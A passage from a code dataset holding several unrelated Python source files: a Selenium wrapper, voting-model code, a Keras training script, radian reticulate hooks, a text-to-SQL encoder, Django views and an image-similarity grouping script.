timeout=driver_wait_time\r\n        )\r\n\r\n    def _get_driver(self, browser, driver_path):\r\n        lowercased_browser = browser.lower()\r\n        if lowercased_browser == \"chrome\":\r\n            driver = webdriver.Chrome() if driver_path is None else \\\r\n                webdriver.Chrome(executable_path=driver_path)\r\n        elif lowercased_browser in (\"edge\", \"msedge\"):\r\n            driver = webdriver.Edge() if driver_path is None else \\\r\n                webdriver.Edge(executable_path=driver_path)\r\n        elif lowercased_browser == \"firefox\":\r\n            driver = webdriver.Firefox() if driver_path is None else \\\r\n                webdriver.Firefox(executable_path=driver_path)\r\n        elif lowercased_browser in (\r\n            \"ie\", \"internetexplorer\", \"internet_explorer\", \"internet explorer\"\r\n        ):\r\n            driver = webdriver.Ie() if driver_path is None else \\\r\n                webdriver.Ie(executable_path=driver_path)\r\n        return driver\r\n\r\n    def go_to(self, url):\r\n        self.driver.get(url)\r\n\r\n    def get(self, url):\r\n        self.driver.get(url)
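\r\n\r\n    # Example usage (illustrative only; the URL is a placeholder):\r\n    #   browser = Browser(\"chrome\")\r\n    #   browser.go_to(\"https://example.com\")\r\n    #   heading = browser.get_element_by_tag_name(\"h1\")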
\r\n\r\n    def get_element(self, locator, waiting=True):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    locator\r\n                )\r\n            )\r\n        else:\r\n            # unpack the (By, value) locator tuple for find_element\r\n            element = self.driver.find_element(\r\n                *locator\r\n            )\r\n        return element\r\n\r\n    def get_element_by_id(self, id, waiting=True):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    (By.ID, id)\r\n                )\r\n            )\r\n        else:\r\n            element = self.driver.find_element_by_id(id)\r\n        return element\r\n\r\n    def get_element_by_name(self, name, waiting=True):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    (By.NAME, name)\r\n                )\r\n            )\r\n        else:\r\n            element = self.driver.find_element_by_name(name)\r\n        return element\r\n\r\n    def get_element_by_xpath(self, xpath, waiting=True):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    (By.XPATH, xpath)\r\n                )\r\n            )\r\n        else:\r\n            element = self.driver.find_element_by_xpath(xpath)\r\n        return element\r\n\r\n    def get_element_by_link_text(self, link_text, waiting=True):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    (By.LINK_TEXT, link_text)\r\n                )\r\n            )\r\n        else:\r\n            element = self.driver.find_element_by_link_text(link_text)\r\n        return element\r\n\r\n    def get_element_by_partial_link_text(\r\n        self, partial_link_text, waiting=True\r\n    ):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    (By.PARTIAL_LINK_TEXT, partial_link_text)\r\n                )\r\n            )\r\n        else:\r\n            element = self.driver.find_element_by_partial_link_text(\r\n                partial_link_text\r\n            )\r\n        return element\r\n\r\n    def get_element_by_tag_name(self, tag_name, waiting=True):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    (By.TAG_NAME, tag_name)\r\n                )\r\n            )\r\n        else:\r\n            element = self.driver.find_element_by_tag_name(tag_name)\r\n        return element\r\n\r\n    def get_element_by_class_name(self, class_name, waiting=True):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    (By.CLASS_NAME, class_name)\r\n                )\r\n            )\r\n        else:\r\n            element = self.driver.find_element_by_class_name(class_name)\r\n        return element\r\n\r\n    def get_element_by_css_selector(self, css_selector, waiting=True):\r\n        if waiting:\r\n            element = self.driver_wait.until(\r\n                EC.visibility_of_element_located(\r\n                    (By.CSS_SELECTOR, css_selector)\r\n                )\r\n            )\r\n        else:\r\n            element = self.driver.find_element_by_css_selector(css_selector)\r\n        return element\r\n\r\n    def scroll_into_view(self, element):\r\n        self.driver.execute_script(\r\n            \"arguments[0].scrollIntoView();\", element\r\n        )\r\n\r\n    def close(self):\r\n        self.driver.close()\r\n","sub_path":"selenium_wrapper.py","file_name":"selenium_wrapper.py","file_ext":"py","file_size_in_byte":5852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"231469276","text":"from data import Models\nimport random\n\nclass Voter(object):\n    def __init__(self, id,\n                 preference_list,\n                 utilities_dict,\n                 vote,\n                 s):\n        \"\"\"\n        :param id: the voter id\n        :param preference_list: (list) the voter preference; the candidate they prefer most will be at index 0, and so on\n        :param utilities_dict: (dict) key: candidate, value: the voter utility if the candidate wins\n        :param vote: (str) the candidate name the voter votes for\n        \"\"\"\n        self.id = id\n        self.preference_list = preference_list\n        self.utilities_dict = utilities_dict\n        self.vote = vote\n        self.s = s\n        self.models = Models()\n\n    def get_CV_parameter(self, voters_list, division_param, l_bound, u_bound):\n        \"\"\"\n        :param voters_list: (list) the voters list\n        :param division_param: (int) how many b values the user wants to check\n        :param l_bound: (int) the lower bound for the parameter\n        :param u_bound: (int) the upper bound for the parameter\n        :return: (dict) CV model values keyed by psai, plus the scores s\n        \"\"\"\n        model_values_dict = {}\n        for i in range(1, division_param + 1):\n            psai = l_bound + int(i * (u_bound - l_bound) / division_param)\n            pivotal_dict = self.models.pivotal_p(psai, voters_list)\n            model_value = self.models.CV(pivotal_dict, self.utilities_dict)\n            model_values_dict[psai] = model_value\n        return model_values_dict, self.s\n\n    def get_KP_parameter(self, k):\n        \"\"\"\n        :param k: (int) how big is the winners group\n        :return: prediction by the KP model for each group size\n        \"\"\"\n        model_values_dict = {}\n        if k not in [1,2,3]:\n            raise RuntimeError('k can be only 1, 2 or 3 and not {0}'.format(k))\n        candidate_score = self.s\n        candidate_list = [(cand, score) for cand, score in candidate_score.items()]\n        candidate_list.sort(key=lambda tup: tup[1])\n        for i in range(k):\n            group_k = candidate_list[:i + 1]  # the top (i + 1) candidates\n            group_k_list_of_dict = {}\n            for tup in group_k:\n                group_k_list_of_dict[tup[0]] = tup[1]\n            model_value = self.models.KP(group_k_list_of_dict, self.utilities_dict)\n            model_values_dict[i + 1] = model_value\n        return model_values_dict, self.s\n\n    def get_AT_parameter(self, division_param, l_bound, u_bound):\n        \"\"\"\n        :param division_param: (int) how many b values the user wants\n        :param l_bound: (int) the lower bound for the parameter\n        :param u_bound: (int) the upper bound for the parameter\n        :return: all AT predictions for all b values\n        \"\"\"\n        model_values_dict = {}\n        candidates = list(self.s.keys())\n        for i_1 in range(1, division_param + 1):\n            b_1 = i_1 * (u_bound - l_bound)/ division_param\n            for i_2 in range(1, division_param + 1):\n                b_2 = i_2 * (u_bound - l_bound) / division_param\n                for i_3 in range(1, division_param + 1):\n                    b_3 = i_3 * (u_bound - l_bound) / division_param\n                    b_dict = {candidates[0]: b_1, candidates[1]: 
b_2, candidates[2] : b_3}\n model_value = self.models.AT(self.utilities_dict, b_dict, self.s,)\n b_list = tuple(b_dict.items())\n model_values_dict[b_list] = model_value\n return model_values_dict, self.s\n\n\n def get_AU_parameters(self, division_param_b, l_bound_b, u_bound_b, e, division_param_a, l_bound_a = 0, u_bound_a = 2):\n \"\"\"\n :param division_param_b: (int) how many b values the user wants\n :param division_param_a: (int) how many a values the user wants\n :param l_bound_b: (int) the lower bound for the parameter b\n :param u_bound_b: (int) the upper bound for the parameter b\n :param l_bound_a: (int) the lower bound for the parameter a, if none l_bound_a = 0\n :param u_bound_a: (int) the upper bound for the parameter a if none u_bound_a = 2\n :param e: (float) the epsilon\n :return: all AU predictions to all b and a values\n \"\"\"\n\n model_values_dict = {}\n candidates = list(self.s.keys())\n for i_1 in range(1, division_param_b + 1):\n b_1 = round(i_1 * (u_bound_b - l_bound_b) / division_param_b,3)\n for i_2 in range(1, division_param_b + 1):\n b_2 = round(i_2 * (u_bound_b - l_bound_b) / division_param_b,3)\n for i_3 in range(1, division_param_b + 1):\n b_3 = round(i_3 * (u_bound_b - l_bound_b) / division_param_b,3)\n b_dict = {candidates[0]: b_1, candidates[1]: b_2, candidates[2]: b_3}\n for j in range(1, division_param_a + 1):\n a = round(j * (u_bound_a - l_bound_a) / division_param_a,3)\n model_value = self.models.AU(self.utilities_dict, e, a, b_dict, self.s,)\n params_dict = b_dict.copy()\n params_dict.update({'a': a})\n params_list = tuple(params_dict.items())\n model_values_dict[params_list] = model_value\n return model_values_dict, self.s\n\n def get_LD_parameter(self, division_param, l_bound, u_bound):\n \"\"\"\n :param division_param: (int) how many r values the user wants\n :param l_bound: (int) the lower bound for the parameter\n :param u_bound: (int) the upper bound for the parameter\n :return: all LD predictions to all r values\n \"\"\"\n model_values_dict = {}\n for i in range(1, division_param + 1):\n r = i * (u_bound - l_bound)/ division_param #can change it to np.linspace\n model_value = self.models.LD(r, self.s, self.utilities_dict)\n model_values_dict[r] = model_value\n return model_values_dict, self.s\n\n\n\n\n\n\n","sub_path":"voters.py","file_name":"voters.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"460667590","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nimport keras.metrics\nimport pandas as pd\nimport numpy as np\nimport math\nfrom keras.callbacks import CSVLogger\nfrom sklearn.model_selection import train_test_split\nimport os\nimport statistics\nfrom keras.models import load_model\n\n\ndef build_dataset():\n\n #Combine all projects\n projects = ['accumulo', 'bookkeeper', 'camel', 'cassandra', 'cxf', 'derby', 'hive', 'openjpa', 'pig', 'wicket']\n dfs = []\n for p in projects:\n p_df = pd.read_csv(\"../files/\"+p+\"/train_data.csv\")\n dfs.append(p_df)\n\n df = pd.concat(dfs)\n\n #Only use buggy methods for this training\n df = df.loc[(df['buggy']==1)&(pd.notna(df['experience']))]\n\n df['experience'] = df['experience'].apply(lambda exp : int(exp))\n\n #Convert vector data to lists\n df['vector'] = df['vector'].apply(lambda v : v.replace('\\n','').split(' '))\n df['vector'] = df['vector'].apply(lambda v : [float(i) for i in v])\n\n #Shuffle the row ordering\n df = df.sample(frac=1).reset_index(drop=True)\n\n 
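# Note: sklearn's train_test_split also shuffles by default, so the explicit\n    # shuffle above is belt-and-braces rather than strictly required.\n    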
#Specify input and output columns\n    X = pd.DataFrame(df['vector'].to_list())\n    y = df['experience']\n\n    #Split into train and test sets\n    X_train,X_test,y_train,y_test = train_test_split(X,y,test_size = 0.1)\n\n    #Save train and test sets\n    X_train.to_pickle(\"../files/nn_training/pickle_barrel/X_train_\"+nn_name+\".pkl\")\n    X_test.to_pickle(\"../files/nn_training/pickle_barrel/X_test_\"+nn_name+\".pkl\")\n    y_train.to_pickle(\"../files/nn_training/pickle_barrel/y_train_\"+nn_name+\".pkl\")\n    y_test.to_pickle(\"../files/nn_training/pickle_barrel/y_test_\"+nn_name+\".pkl\")\n\n    return X_train,X_test,y_train,y_test\n\ndef get_dataset():\n\n    #If the dataset has never been made, make it\n    if not os.path.exists(\"../files/nn_training/pickle_barrel/X_train_\"+nn_name+\".pkl\"):\n        return build_dataset()\n\n    #If it has been made, load the saved dataset\n    X_train = pd.read_pickle(\"../files/nn_training/pickle_barrel/X_train_\"+nn_name+\".pkl\")\n    X_test = pd.read_pickle(\"../files/nn_training/pickle_barrel/X_test_\"+nn_name+\".pkl\")\n    y_train = pd.read_pickle(\"../files/nn_training/pickle_barrel/y_train_\"+nn_name+\".pkl\")\n    y_test = pd.read_pickle(\"../files/nn_training/pickle_barrel/y_test_\"+nn_name+\".pkl\")\n\n    return X_train,X_test,y_train,y_test\n\n\ndef load_nn():\n    if os.path.exists(\"../files/nn_training/models/NN_semantic_\"+nn_name+\".h5\"):\n        return load_model(\"../files/nn_training/models/NN_semantic_\"+nn_name+\".h5\")\n\n    input_dimensions = 384\n    output_dimensions = 1\n    model = Sequential()\n    model.add(Dense(128, input_dim=input_dimensions,activation='relu'))\n    model.add(Dense(32, activation='relu'))\n    model.add(Dense(output_dimensions,activation='linear'))\n    model.compile(loss=\"mean_squared_error\", optimizer='adam')\n    return model\n\ndef train(nepochs):\n    #Train model\n    csv_logger = CSVLogger(\"../files/nn_training/training/nn_training_\"+nn_name+\".csv\", append=True)\n    model.fit(X_train,y_train,validation_data = (X_test,y_test), epochs=nepochs, verbose=1, callbacks=[csv_logger])\n    model.save(\"../files/nn_training/models/NN_semantic_\"+nn_name+\".h5\")\n\n\ndef test():\n    model = load_model(\"../files/nn_training/models/NN_semantic_\"+nn_name+\".h5\")\n    y_pred = model.predict(X_test)\n    #Converting predictions to label\n    pred = list()\n    test = list()\n    MAE = []\n    MSE = []\n    for i in range(len(y_pred)):\n        MAE.append(abs((y_pred[i][0]) - (y_test.iloc[i])))\n        MSE.append(((y_pred[i][0]) - (y_test.iloc[i]))**2)\n    MAE = statistics.median(MAE)\n    MSE = statistics.mean(MSE)\n\n    print(\"Median Absolute Error:\",MAE)\n    print(\"Mean Squared Error:\",MSE)\n\n\n\nnn_name = \"experience\"\nmodel = load_nn()\nX_train,X_test,y_train,y_test = get_dataset()\ntrain(0)\ntest()\n","sub_path":"python_models/NN_experience.py","file_name":"NN_experience.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16152377","text":"with open(\"./pattern\") as pattern_file:\n    output_file = open('pattern_convert','w')\n    for row in pattern_file:\n        newline = ''\n        # strip the trailing newline so it is not counted as a '1'\n        for char in row.rstrip('\\n'):\n            if char == '.':\n                newline += '0'\n            else:\n                newline += '1'\n        while len(newline) < 100:\n            newline += '0'\n        output_file.write(newline + '\\n')\n    output_file.close()\n\n\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"538050104","text":"from __future__ import unicode_literals\nimport os\nimport 
sys\nfrom code import compile_command\n\nfrom prompt_toolkit.completion import Completion\n\nfrom rchitect import rcall, rcopy\nfrom rchitect.interface import roption, setoption, set_hook, package_event\n\nfrom radian.rutils import package_is_installed, source_file\n\nfrom radian.key_bindings import insert_mode, default_focused, cursor_at_begin, text_is_empty\nfrom radian.key_bindings import commit_text\nfrom radian import get_app\nfrom radian.settings import radian_settings as settings\n\nfrom six import text_type\n\ntry:\n import jedi\nexcept ImportError:\n pass\n\n\nRETICULATE_MESSAGE = \"\"\"\nThe host python environment is {}\nand `radian` is forcing `reticulate` to use this version of python.\nAny python packages needed, e.g., `tensorflow` and `keras`,\nhave to be available to the current python environment.\n\nFile an issue at https://github.com/randy3k/radian if you encounter any\ndifficulties in loading `reticulate`.\n\"\"\".format(sys.executable).strip()\n\n\ndef configure():\n if not roption(\"radian.suppress_reticulate_message\", False):\n set_hook(package_event(\"reticulate\", \"onLoad\"), reticulate_message_hook)\n\n if package_is_installed(\"reticulate\") and roption(\"radian.enable_reticulate_prompt\", True):\n set_hook(package_event(\"reticulate\", \"onLoad\"), reticulate_prompt_hook)\n\n session = get_app().session\n kb = session.modes[\"r\"].prompt_key_bindings\n browsekb = session.modes[\"browse\"].prompt_key_bindings\n\n @kb.add('~', filter=insert_mode & default_focused & cursor_at_begin & text_is_empty)\n @browsekb.add('~', filter=insert_mode & default_focused & cursor_at_begin & text_is_empty)\n def _(event):\n setoption(\"radian.suppress_reticulate_message\", True)\n commit_text(event, \"reticulate::repl_python()\", False)\n\n\ndef reticulate_message_hook(*args):\n if not roption(\"radian.suppress_reticulate_message\", False):\n rcall(\"packageStartupMessage\", RETICULATE_MESSAGE)\n\n\ndef reticulate_prompt_hook(*args):\n source_file(os.path.join(os.path.dirname(__file__), \"key_bindings.R\"))\n\n\ndef prase_text_complete(code):\n if \"\\n\" in code:\n try:\n return compile_command(code, \"\", \"exec\") is not None\n except Exception:\n return True\n else:\n if len(code.strip()) == 0:\n return True\n elif code[0] == \"?\" or code[-1] == \"?\":\n return True\n else:\n try:\n return compile_command(code, \"\", \"single\") is not None\n except Exception:\n return True\n\n\ndef get_reticulate_completions(document, complete_event):\n word = document.get_word_before_cursor()\n prefix_length = settings.completion_prefix_length\n if len(word) < prefix_length and not complete_event.completion_requested:\n return []\n\n glo = rcopy(rcall((\"reticulate\", \"py_run_string\"), \"globals()\"))\n loc = rcopy(rcall((\"reticulate\", \"py_run_string\"), \"locals()\"))\n try:\n script = jedi.Interpreter(\n document.text,\n column=document.cursor_position_col,\n line=document.cursor_position_row + 1,\n path=\"input-text\",\n namespaces=[glo, loc]\n )\n return [\n Completion(\n text_type(c.name_with_symbols),\n len(text_type(c.complete)) - len(text_type(c.name_with_symbols)))\n for c in script.completions()\n ]\n\n except Exception:\n return []\n","sub_path":"radian/reticulate/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"329616776","text":"import attr\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom seq2struct.models import 
spider_enc\nfrom seq2struct.utils import batched_sequence\nfrom seq2struct.utils import registry\n\n\n@attr.s\nclass EncoderOutput:\n q_enc = attr.ib()\n q_len = attr.ib()\n col_enc = attr.ib()\n col_name_len = attr.ib()\n col_len = attr.ib()\n\n\nclass FakePreproc:\n vocab = None\n\n\nclass Seq2structEncoder(nn.Module):\n def __init__(self, N_word, N_h, N_depth, word_embedding_layer, encode_cols, spider_enc_config, gpu):\n super(Seq2structEncoder, self).__init__()\n self.N_word = N_word\n self.N_h = N_h\n self.N_depth = N_depth\n\n self.word_embedding_layer = word_embedding_layer\n self.encode_cols = encode_cols\n self.zero_emb = np.zeros(self.N_word, dtype=np.float32)\n self.gpu = gpu\n\n self.spider_enc = registry.instantiate(\n spider_enc.SpiderEncoderV2,\n spider_enc_config,\n device=torch.device('cuda') if gpu else torch.device('cpu'),\n preproc=FakePreproc,\n word_emb_size=N_word,\n recurrent_size=N_h,\n )\n\n \n def _lookup_embeddings(self, seqs):\n # shape: [sum of seq lengths, 1, N_word]\n embs = torch.from_numpy(np.stack([\n self.word_embedding_layer.word_emb.get(token, self.zero_emb)\n for seq in seqs\n for token in seq\n ], axis=0)).unsqueeze(1)\n if self.gpu:\n embs = embs.cuda()\n boundaries = np.cumsum([0] + [len(seq) for seq in seqs])\n\n return embs, boundaries\n\n def _lookup_embeddings_batched(self, token_lists):\n # token_lists: list of list of lists\n # [batch, num descs, desc length]\n # - each list contains tokens\n # - each list corresponds to a column name, table name, etc.\n\n # PackedSequencePlus, with shape: [batch, sum of desc lengths, emb_size]\n all_embs = batched_sequence.PackedSequencePlus.from_lists(\n lists=[\n [\n token \n for token_list in token_lists_for_item\n for token in token_list\n ]\n for token_lists_for_item in token_lists\n ],\n item_shape=(self.N_word,),\n tensor_type=torch.FloatTensor,\n item_to_tensor=lambda token, batch_idx, out: out.copy_(torch.from_numpy(\n self.word_embedding_layer.word_emb.get(token, self.zero_emb))),\n )\n if self.gpu:\n all_embs = all_embs.apply(lambda d: d.cuda())\n\n # boundaries shape: [batch, num descs + 1]\n boundaries = [\n np.cumsum([0] + [len(token_list) for token_list in token_lists_for_item])\n for token_lists_for_item in token_lists]\n\n return all_embs, boundaries\n\n def _pad_sequences(self, seq_encs):\n # each element of seq_encs has shape\n # [1, seq length, emb size]\n # returns [batch size, max length, emb size]\n max_length = max(seq_enc.shape[1] for seq_enc in seq_encs)\n result = seq_encs[0].data.new(len(seq_encs), max_length, *seq_encs[0].shape[2:]).fill_(0)\n for i, seq_enc in enumerate(seq_encs):\n result[i, :seq_enc.shape[0]] = seq_enc[:, 0]\n return result\n\n def forward_unbatched(self, data, perm, st, ed, table_type):\n batch_size = ed - st\n\n q_encs = []\n col_encs = []\n # Number of columns in each entry of batch\n col_lens = []\n\n # TODO need to call forward_unbatched versions for this to work\n for permuted_idx in perm[st:ed]:\n q_enc, (_, _) = self.spider_enc.question_encoder(self._lookup_embeddings([data[permuted_idx]['question_tokens']]))\n\n table_names, column_names, column_types, \\\n column_to_table, table_to_column, foreign_keys, \\\n foreign_keys_tables, primary_keys = data[permuted_idx]['ts']\n desc = {\n 'columns': [[column_type] + column_name.split() for (table_id, column_name), column_type in zip(column_names, column_types)],\n 'tables': [table_name.split() for table_name in table_names],\n 'column_to_table': column_to_table,\n 'table_to_column': table_to_column,\n 
'foreign_keys': foreign_keys,\n 'foreign_keys_tables': foreign_keys_tables,\n 'primary_keys': primary_keys,\n }\n\n c_enc, c_boundaries = self.spider_enc.column_encoder(\n self._lookup_embeddings(desc['columns']))\n t_enc, t_boundaries = self.spider_enc.table_encoder(\n self._lookup_embeddings(desc['tables']))\n #assert np.all((c_boundaries[1:] - c_boundaries[:-1]) == 1)\n \n q_enc_new, c_enc_new, t_enc_new = self.spider_enc.encs_update(\n desc, q_enc, c_enc, c_boundaries, t_enc, t_boundaries)\n \n q_encs.append(q_enc_new)\n col_encs.append(c_enc_new)\n col_lens.append(len(desc['columns']))\n \n q_enc = self._pad_sequences(q_encs)\n q_len = np.array([q_enc_elem.shape[1] for q_enc_elem in q_encs], dtype=np.int64)\n col_enc = self._pad_sequences(col_encs)\n col_name_len = None\n col_len = np.array(col_lens, dtype=np.int64)\n\n return EncoderOutput(q_enc, q_len, col_enc, col_name_len, col_len)\n\n def forward(self, data, perm, st, ed, table_type):\n batch_size = ed - st\n\n descs = []\n for permuted_idx in perm[st:ed]:\n table_names, column_names, column_types, \\\n column_to_table, table_to_column, foreign_keys, \\\n foreign_keys_tables, primary_keys = data[permuted_idx]['ts']\n desc = {\n 'question': data[permuted_idx]['question_tokens'],\n 'columns': [[column_type] + column_name.split() for (table_id, column_name), column_type in zip(column_names, column_types)],\n 'tables': [table_name.split() for table_name in table_names],\n 'column_to_table': column_to_table,\n 'table_to_column': table_to_column,\n 'foreign_keys': foreign_keys,\n 'foreign_keys_tables': foreign_keys_tables,\n 'primary_keys': primary_keys,\n }\n descs.append(desc)\n\n q_enc, _ = self.spider_enc.question_encoder(\n self._lookup_embeddings_batched([[desc['question']] for desc in descs]))\n c_enc, c_boundaries = self.spider_enc.column_encoder(\n self._lookup_embeddings_batched([desc['columns'] for desc in descs]))\n t_enc, t_boundaries = self.spider_enc.table_encoder(\n self._lookup_embeddings_batched([desc['tables'] for desc in descs]))\n\n #q_enc_new, c_enc_new, t_enc_new = self.spider_enc.encs_update(descs, q_enc, c_enc, c_boundaries, t_enc, t_boundaries)\n #q_enc, q_len = q_enc_new.pad(batch_first=True)\n #q_len = np.array(q_len, dtype=np.int64)\n #col_enc, col_len = c_enc_new.pad(batch_first=True)\n #col_name_len = None\n #col_len = np.array(col_len, dtype=np.int64)\n\n q_encs = []\n col_encs = []\n # Number of columns in each entry of batch\n col_lens = []\n for i, desc in enumerate(descs):\n q_enc_new, c_enc_new, t_enc_new = self.spider_enc.encs_update.forward_unbatched(\n desc,\n q_enc.select(i).unsqueeze(1),\n c_enc.select(i).unsqueeze(1),\n c_boundaries[i],\n t_enc.select(i).unsqueeze(1),\n t_boundaries[i])\n \n q_encs.append(q_enc_new)\n col_encs.append(c_enc_new)\n col_lens.append(len(desc['columns']))\n \n q_enc = self._pad_sequences(q_encs)\n q_len = np.array([q_enc_elem.shape[1] for q_enc_elem in q_encs], dtype=np.int64)\n col_enc = self._pad_sequences(col_encs)\n col_name_len = None\n col_len = np.array(col_lens, dtype=np.int64)\n return EncoderOutput(q_enc, q_len, col_enc, col_name_len, col_len)\n","sub_path":"models/seq2struct_encoder.py","file_name":"seq2struct_encoder.py","file_ext":"py","file_size_in_byte":8142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323993842","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Product,Menu,Item;\n# Create your views here.\n\ndef index(request):\n return 
render(request,'index.html')\n\ndef addProduct(request):\n    return render(request,'addProduct.html')\n\ndef saveProduct(request):\n    pid=request.POST['pid']\n    pname=request.POST['pname']\n    pdate=request.POST['pdate']\n    p=Product(pid,pname,pdate)\n    p.save()\n\n    return render(request,'index.html')\n\ndef displayProducts(request):\n    records=Product.objects.all()\n\n    return render(request,'display.html',{'recs':records})\n\n\ndef menuCreate(request):\n    breakfast=Menu(101,'Breakfast')\n    item1=Item(901,'idli',20,menu=breakfast)\n    item2=Item(902,'soup',30,menu=breakfast)\n    cooldrinks=Menu(201,'cool drinks')\n    item3=Item(801,'pepsy',menu=cooldrinks)\n    item4=Item(802,'mazza',menu=cooldrinks)\n    item5=Item(803,'sprite',menu=cooldrinks)\n    icecreams=Menu(301,'Ice Creams')\n    item6=Item(401,'venalaa',menu=icecreams)\n    item7=Item(402,'choocklet',menu=icecreams)\n\n    breakfast.save()\n    item1.save()\n    item2.save()\n    cooldrinks.save()\n    item3.save()\n    item4.save()\n    item5.save()\n    icecreams.save()\n    item6.save()\n    item7.save()\n\n    return render(request,'display.html')\n\n\ndef menuDelete(request):\n    return render(request,'display.html')","sub_path":"ProductApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160464051","text":"# -*- coding: utf-8 -*-\nimport warnings\nwarnings.simplefilter(action='ignore', category=(FutureWarning,UserWarning))\n\nimport os, sys\nimport shutil\nimport logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s, p%(process)s %(levelname)-8s [%(pathname)s:%(module)s:%(funcName)s:%(lineno)d] %(message)s')\nimport textwrap, argparse\nfrom argparse import RawDescriptionHelpFormatter\n\nimport cv2\nimport numpy as np\nfrom skimage import img_as_float, color\nfrom skimage.measure import compare_ssim as ssim\nutils_parent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append(os.path.join(utils_parent_dir, 'modules/common'))\nimport utils\n\ndef parse_arguments():\n    parser = argparse.ArgumentParser(\n        formatter_class = argparse.RawDescriptionHelpFormatter,\n        description=textwrap.dedent('''\n            Given a set of images, find the similar images for each one in the set.\n            ''')\n    )\n\n    # Required arguments\n    parser.add_argument(\n        'in_dir',\n        help='Directory to load in images.'\n    )\n\n    # Required arguments\n    parser.add_argument(\n        'out_dir',\n        help='Directory to save output images.'\n    )\n\n    # Optional arguments\n    parser.add_argument(\n        '--pattern', required=False,\n        metavar='',\n        default='',\n        help='Naming pattern of the desired files (default: \"\").'\n    )\n\n    # Optional arguments\n    parser.add_argument(\n        '--extensions', required=False,\n        metavar='',\n        default='jpg',\n        help='List of extensions of the desired files, separated by comma (default: \"jpg\").'\n    )\n\n    return parser.parse_args()\n\ndef process_images(path1, path2):\n    # Load in one image\n    img1 = utils.load_color_image(path1)\n    img1 = color.rgb2gray(img1)\n    img1 = img_as_float(img1)\n\n    # Load in the other image\n    img2 = utils.load_color_image(path2)\n    img2 = color.rgb2gray(img2)\n    img2 = img_as_float(img2)\n\n    if img1.shape == img2.shape:\n        return ssim(img1, img2, data_range=img1.max() - img1.min())\n    else:\n        return 0.0\n\ndef process_images_thread(image_pairs, similarity, beg, end):\n    for i in range(beg, end):\n        path1, path2, i, j = image_pairs[i]\n        similarity[i][j] = process_images(path1, path2)\n\ndef do_it(in_dir, out_dir, pattern, extensions):\n    # Check if input 
directory exists\n if not os.path.exists(in_dir):\n logging.critical('Failed to find {}'.format(in_dir))\n sys.exit()\n\n # Get all images in the input directory\n _, image_paths, _ = utils.list_files(in_dir, pattern, extensions)\n image_paths = sorted(image_paths)\n\n n_samples = len(image_paths)\n logging.info('Total files: {}'.format(n_samples))\n\n # Generate image pairs for parallel computing\n image_pairs = []\n for i in range(n_samples):\n query_image_path = os.path.join(in_dir, image_paths[i])\n\n for j in range(i+1, n_samples):\n current_image_path = os.path.join(in_dir, image_paths[j])\n\n image_pairs.append((query_image_path, current_image_path, i, j))\n\n n_pairs = len(image_pairs)\n similarity = np.zeros((n_samples, n_samples), dtype = np.float32)\n threads = utils.parallel(n_pairs, process_images_thread, image_pairs, similarity)\n\n for i in range(len(threads)):\n threads[i].join()\n\n# # np.save('./similarity.npy', similarity)\n# similarity = np.load('./similarity.npy')\n\n # Group similar images to sets\n similar_image_sets = []\n\n k = 0\n for i in range(n_samples):\n for j in range(i+1, n_samples):\n if similarity[i][j] >= 0.7:\n # logging.info('{} is similar to {}'.format(image_pairs[k][0], image_pairs[k][1]))\n\n # Add a new image to one of the existing sets if it belongs to\n # the same group\n found = False\n for image_set in similar_image_sets:\n if image_pairs[k][0] in image_set or image_pairs[k][1] in image_set:\n image_set.add(image_pairs[k][0])\n image_set.add(image_pairs[k][1])\n found = True\n break\n\n # Otherwise, create new one and add the set to the list of sets\n if not found:\n similar_image_sets.append(set([image_pairs[k][0], image_pairs[k][1]]))\n k += 1\n\n for i, image_set in enumerate(similar_image_sets):\n # Copy all images in the same set to a single folder\n out_sub_dir = os.path.join(out_dir, '{:02}'.format(i))\n utils.safe_makedirs(out_sub_dir)\n\n for image_path in image_set:\n dirname, filename = os.path.split(image_path)\n out_path = os.path.join(out_sub_dir, filename)\n shutil.copyfile(image_path, out_path)\n\nif __name__ == '__main__':\n\n args = parse_arguments()\n\n # Remove the whitespaces in list of extensions\n extensions = utils.trim_whitespaces(args.extensions, side_only=False)\n\n # Get the list of extensions and discard the null character\n extensions = list(filter(None, extensions.split(',')))\n\n # Remove the redundant elements\n extensions = list(set(extensions))\n\n # Tidy up directories\n args.in_dir = args.in_dir.rstrip('/\\\\')\n args.out_dir = args.out_dir.rstrip('/\\\\')\n\n do_it(args.in_dir, args.out_dir, args.pattern, 